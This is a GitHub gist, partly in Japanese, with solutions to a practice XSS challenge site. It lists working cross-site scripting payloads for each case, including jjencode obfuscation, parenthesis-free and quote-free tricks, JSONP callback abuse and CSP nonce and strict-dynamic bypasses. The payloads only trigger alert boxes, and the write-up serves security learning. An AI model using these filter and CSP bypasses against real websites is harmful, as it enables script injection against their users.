Skip to content

Instantly share code, notes, and snippets.

@shiv3

shiv3/XSS Challenge.md Secret

Last active Dec 1, 2018
Embed
What would you like to do?

Case 01: Simple XSS 1

https://xss.shift-js.info/case01.php?payload=%3Cimg+onerror%3Dalert%28%27XSS%27%29+src%3D%2F%3E

Simple <img onerror=alert('XSS') src=/>

Case 02: Simple XSS 2

https://xss.shift-js.info/case02.php#%3Cimg%20onerror=alert(document.domain)%20src=/%3E

ハッシュに入れる

<img onerror=alert(document.domain) src=/>

Case 03: With htmlspecialchars()

https://xss.shift-js.info/case03.php?payload=javascript%3Aalert%28%22XSS%22%29

aタグに甘える

javascript:alert("XSS")

Case 04-1/04-2: Without any backquotes and HTML tags

https://xss.shift-js.info/case04-1.php?payload=%24%7Balert%28%27XSS%27%29%7D

https://xss.shift-js.info/case04-2.php?payload=%24%7Balert%28%27XSS%27%29%7D

template literal内で実行 ${alert('XSS')}

Case 05: Without any alphabets

https://xss.shift-js.info/case05.php?payload=%24%3D~%5B%5D%3B%24%3D%7B___%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C__%24%3A%2B%2B%24%2C%24_%24_%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C_%24_%3A%2B%2B%24%2C%24_%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C_%24%24%3A%2B%2B%24%2C%24%24%24_%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24__%3A%2B%2B%24%2C%24_%24%3A%2B%2B%24%2C%24%24__%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24___%3A%2B%2B%24%2C%24__%24%3A%2B%2B%24%7D%3B%24.%24_%3D%28%24.%24_%3D%24%2B%22%22%29%5B%24.%24_%24%5D%2B%28%24._%24%3D%24.%24_%5B%24.__%24%5D%29%2B%28%24.%24%24%3D%28%24.%24%2B%22%22%29%5B%24.__%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24._%24%24%5D%2B%28%24.__%3D%24.%24_%5B%24.%24%24_%5D%29%2B%28%24.%24%3D%28%21%22%22%2B%22%22%29%5B%24.__%24%5D%29%2B%28%24._%3D%28%21%22%22%2B%22%22%29%5B%24._%24_%5D%29%2B%24.%24_%5B%24.%24_%24%5D%2B%24.__%2B%24._%24%2B%24.%24%3B%24.%24%24%3D%24.%24%2B%28%21%22%22%2B%22%22%29%5B%24._%24%24%5D%2B%24.__%2B%24._%2B%24.%24%2B%24.%24%24%3B%24.%24%3D%28%24.___%29%5B%24.%24_%5D%5B%24.%24_%5D%3B%24.%24%28%24.%24%28%24.%24%24%2B%22%5C%22%22%2B%24.%24_%24_%2B%28%21%5B%5D%2B%22%22%29%5B%24._%24_%5D%2B%24.%24%24%24_%2B%22%5C%5C%22%2B%24.__%24%2B%24.%24%24_%2B%24._%24_%2B%24.__%2B%22%28%5C%5C%5C%22%5C%5C%22%2B%24.__%24%2B%24._%24%24%2B%24.___%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%5C%22%5C%5C%22%2B%24.%24__%2B%24.___%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B

jjencode

alert('XSS')

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$._$$+"\\\"\\"+$.$__+$.___+")"+"\"")())();

Case 06-1/06-2/06-3: Without any parentheses and on*

https://xss.shift-js.info/case06.php?payload=%3Cscript%3E+document%5B%60locati%24%7B%22o%22%7Dn%60%5D%3D%60javascript%3Aalert%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%7D%27XSS%27%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%7D%60+%3C%2Fscript%3E

$escaped = preg_replace("/[()]/", "", $_GET['payload']);
$escaped = preg_replace("/[oO][nN]/", "", $escaped);

カッコが使えないのでdocument.location=javascript:~ で実行してしまう。 それとon/ON/On/oNがダメなので適当に回避。

<script>
document[`locati${"o"}n`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>

06-3

<script>
t=[b+""][0][7];window[`docume${t}t`][`locatio${t}`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>

o/O => n/Nが使えないのでnを適当な変数に入れる。

Case 07-1/07-2: Without any quotes

https://xss.shift-js.info/case07-1.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')

https://xss.shift-js.info/case07-2.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')

<script>eval(location.hash.substring(1))</script> #alert('XSS')

各種quateが使えないのでhashに載せてevalで実行したけど 、こんな感じでも解けますね…

<script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))</script>

こんな感じで雑に作りました

"<script>eval(String.fromCharCode("+ `alert("XSS")`.split("").map(s=>s.charCodeAt(0)).join() +"))</script>"

Case 08-1/08-2: Without any backquotes, parentheses and HTML tags

https://xss.shift-js.info/case08.php?payload=%22+onmouseover%3D%27document.location%3D%22javascript%3Aalert%22%2B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%2B%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B+%22XSS%22+%2B+%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%27

カッコ()を適当なところ(atob)から取ってきました。 あとタグが切れないのでOnMouseOverで誤魔化しました…

" onmouseover='document.location="javascript:alert"+[atob+""][0][13]+[alert+""][0][19] + "XSS" + [alert+""][0][19] +[atob+""][0][14]'

Case 09-1: Without any spaces

https://xss.shift-js.info/case09.php?payload=%3Cscrscriptipt%3Ealert%28%27XSS%27%29%3C%2Fscrscriptipt%3E

$escaped = preg_replace("/\s/", "", $_GET['payload']);
$escaped = preg_replace("/script/", "", $escaped);

<scrscriptipt>alert('XSS')</scrscriptipt>とか <s cript>alert('XSS')</s cript>とかで出来ました

エスケープが雑だったので一番カンタンだったかもしれない…

Case 09-2: Without any spaces

slashで空白を作る

<img/src="1"/onerror=alert("XSS")>


Case 20: Bad use of JSONP

https://xss.shift-js.info/case20.php?payload=%3Cscript+src%3D%27https%3A%2F%2Fxss.shift-js.info%2Fjsonp.php%3Fcallback%3Dalert%28%2522XSS%2522%29%27%3E%3C%2Fscript%3E

jsonpのcallbackをいじります。

<script src='https://xss.shift-js.info/jsonp.php?callback=alert(%22XSS%22)'></script>

Case 21: nonce + unsafe-eval

https://xss.shift-js.info/case21.php?payload=%22+id%3D1+%3Cinput+id%3D%22equation%22+value%3Dalert%28%22XSS%22%29%3E%3C/body%3E%3C!--

equationのvalueを上書き

" id=1 <input id="equation" value=alert("XSS")></body><!--

Case 22: nonce + unsafe-eval

https://xss.shift-js.info/case22.php?payload=%7B%7Bconstructor.constructor%28%27alert%28%22XSS%22%29%27%29%28%29%7D%7D

こちら を参考にしました

{{constructor.constructor('alert("XSS")')()}}

Case 23: nonce + strict-dynamic

https://xss.shift-js.info/case23.php?payload=alert%28%27XSS%27%29%2F%2F%3Cscript+id%3D%22injectarea%22%3E%3C%2Fscript%3E%3Cdiv+id%3D

こちらを参考にしました。

alert('XSS')//<script id="injectarea"></script><div id=
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.